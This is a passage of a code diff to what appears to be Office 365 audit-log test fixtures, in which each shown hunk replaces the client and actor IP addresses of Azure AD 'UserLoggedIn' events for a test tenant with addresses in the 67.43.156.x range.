"Actor": [ @@ -1227,10 +1227,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "37.29.234.179", + "ActorIpAddress": "67.43.156.14", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "AzureActiveDirectoryEventType": 1, - "ClientIP": "37.29.234.179", + "ClientIP": "67.43.156.14", "CreationTime": "2020-02-08T14:38:40", "ExtendedProperties": [ { @@ -1280,7 +1280,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"5aff2d1c-b203-46a6-96f0-b8f908f0e968\",\"InterSystemsId\":\"4a50a549-adf3-4a22-9037-7fd8cd3d0116\",\"IntraSystemId\":\"1d856a16-b179-41ab-9c0d-af1d2b925100\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"5aff2d1c-b203-46a6-96f0-b8f908f0e968\",\"InterSystemsId\":\"4a50a549-adf3-4a22-9037-7fd8cd3d0116\",\"IntraSystemId\":\"1d856a16-b179-41ab-9c0d-af1d2b925100\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1298,10 +1298,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:16", "ExtendedProperties": [ { @@ -1351,7 +1351,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3d8033cf-eecd-4eee-87a5-795efd8a1d3d\",\"InterSystemsId\":\"4e44a55e-9c0d-4cea-b000-1b79e96dcf57\",\"IntraSystemId\":\"fc33c54e-38b9-4ef2-a4ee-a3a324a45500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3d8033cf-eecd-4eee-87a5-795efd8a1d3d\",\"InterSystemsId\":\"4e44a55e-9c0d-4cea-b000-1b79e96dcf57\",\"IntraSystemId\":\"fc33c54e-38b9-4ef2-a4ee-a3a324a45500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1369,10 +1369,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:16", "ExtendedProperties": [ { @@ -1422,7 +1422,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8bd0a250-74f6-4eeb-ba20-c5bdbd977013\",\"InterSystemsId\":\"4e91c3e1-819e-4ebc-ae68-2037cfc2db92\",\"IntraSystemId\":\"a063e495-5883-4837-8186-5828f9f2d500\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8bd0a250-74f6-4eeb-ba20-c5bdbd977013\",\"InterSystemsId\":\"4e91c3e1-819e-4ebc-ae68-2037cfc2db92\",\"IntraSystemId\":\"a063e495-5883-4837-8186-5828f9f2d500\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1440,10 +1440,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:38:25", "ExtendedProperties": [ { @@ -1493,7 +1493,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"08e18876-6177-487e-b8b5-cf950c1e598c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a6fc9a9b-3b7e-4d33-8c0c-1d33d023e558\",\"InterSystemsId\":\"50d648cb-466d-4cf4-b2f8-3b7e84f47040\",\"IntraSystemId\":\"64613cae-510d-4a52-b486-070b775e5800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"08e18876-6177-487e-b8b5-cf950c1e598c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a6fc9a9b-3b7e-4d33-8c0c-1d33d023e558\",\"InterSystemsId\":\"50d648cb-466d-4cf4-b2f8-3b7e84f47040\",\"IntraSystemId\":\"64613cae-510d-4a52-b486-070b775e5800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1511,10 +1511,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "08e18876-6177-487e-b8b5-cf950c1e598c", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:44:04", "ExtendedProperties": [ { @@ -1564,7 +1564,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"19d57a4a-d32e-4dc6-971f-3491bc440023\",\"InterSystemsId\":\"5a453031-0cc3-4577-a589-4c3bf37eed78\",\"IntraSystemId\":\"814a32f0-27fd-4e82-855c-13da15a4c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"19d57a4a-d32e-4dc6-971f-3491bc440023\",\"InterSystemsId\":\"5a453031-0cc3-4577-a589-4c3bf37eed78\",\"IntraSystemId\":\"814a32f0-27fd-4e82-855c-13da15a4c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1582,10 +1582,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:51:45", "ExtendedProperties": [ { @@ -1635,7 +1635,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"0b158f74-e223-43c8-9cfd-5f4442f29fc7\",\"InterSystemsId\":\"5cd6215d-e206-4c3f-805d-6e386cbdab7a\",\"IntraSystemId\":\"9c218a27-ed51-4011-8383-e76850e85000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"0b158f74-e223-43c8-9cfd-5f4442f29fc7\",\"InterSystemsId\":\"5cd6215d-e206-4c3f-805d-6e386cbdab7a\",\"IntraSystemId\":\"9c218a27-ed51-4011-8383-e76850e85000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1653,10 +1653,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:01", "ExtendedProperties": [ { @@ -1706,7 +1706,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"00000003-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4819a0c2-2050-4549-ab66-f5b90cbbcc5a\",\"InterSystemsId\":\"612b339f-1088-a000-f25f-9c8af4d57894\",\"IntraSystemId\":\"c847a864-4ba2-4d8b-a9f2-5f1c1c5c5e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000003-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 